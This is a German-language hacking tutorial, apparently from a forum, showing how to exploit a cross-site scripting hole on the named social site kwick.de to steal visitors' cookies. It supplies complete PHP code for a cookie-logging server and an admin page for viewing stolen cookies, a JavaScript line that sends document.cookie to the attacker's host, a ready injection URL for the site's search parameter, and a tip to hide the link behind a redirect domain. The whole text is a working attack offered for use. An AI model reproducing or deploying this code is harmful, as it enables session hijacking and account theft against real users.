Hi, da viele nicht wissen, wie man eine Xss Lücke ausnutzt kommt nun ein kleines Tutorial von mir.

Was wir brauchen:
- Einen FTP Server
- Eine Domain .6xt.to  oder .de.vu , etc.

Schritt 1:

Wir laden folgende Dateien auf unseren FTP.

index.php
<?php
if (trim($_GET['main'] != "")){
$cookie = $_GET['main'];
$go = fopen("cookies.txt","a");
fwrite($go, "$cookie \n");
fclose($go);
header('Location: http://www.google.de'); // Wohin nach dem Klau ?
exit();
} else {
header('Location: http://www.google.de'); // Wohin nach dem Klau ?
exit();
}
?>

admin.php

<?php
$username = "EinLoginName"; // Benutzernamen
$password = "EuerPasswort"; //Passwort
if ($_POST['txtUsername'] != $username || $_POST['txtPassword'] != $password) {
?>
<center>
<h1>Cookie Login:</h1>

<form name="form" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">
<label for="txtUsername">Username:</label>
<input type="text" title="Enter your Username" name="txtUsername" /></p>
<label for="txtpassword">Password:</label>
<input type="password" title="Enter your password" name="txtPassword" /></p>
<input type="submit" name="Submit" value="Login" /></p><center>
</form>
<?php
}
else {
?>
<center>Cookie List:<br><br>
<form name="form">
<textarea cols="80" rows="30">
<? include("cookies.txt"); ?></textarea></form>
<?php
}
?>

include.js

location.href='http://DeineSeite/Pfad/index.php?main='+document.cookie+''


cookies.txt

leerer Inhalt

Schritt 2:
Alle Dateien mittels CHMOD auf 777 setzen

Schritt 3:
Nun wird der Code in die Lücke eingebaut, hierfür nehmen wir die Lücke von Kwick.de, welche sich hier befindet.

http://www.kwick.de/community/hilfe/?search=>"<script>alert(document.cookie);</script>

Ausgenutzt sieht diese Lücke folgendermaßen aus:
http://www.kwick.de/community/hilfe/?search=>"<SCRIPT SRC=http://yoursite.com/include.js></SCRIPT>

Schritt 4:
Da es auffällig ist die Url so zu verschicken registieren wir uns eine Domain und benutzen diese zum umleiten.

Schritt 5:
Wir loggen uns im Admin Menü mit unseren Daten ein und haben einblick in alle geklauten Cookies.


Tutorial by: -tmh-
Release    : http://www.sys-flaw.com/ && http://b-baerchi.6x.to/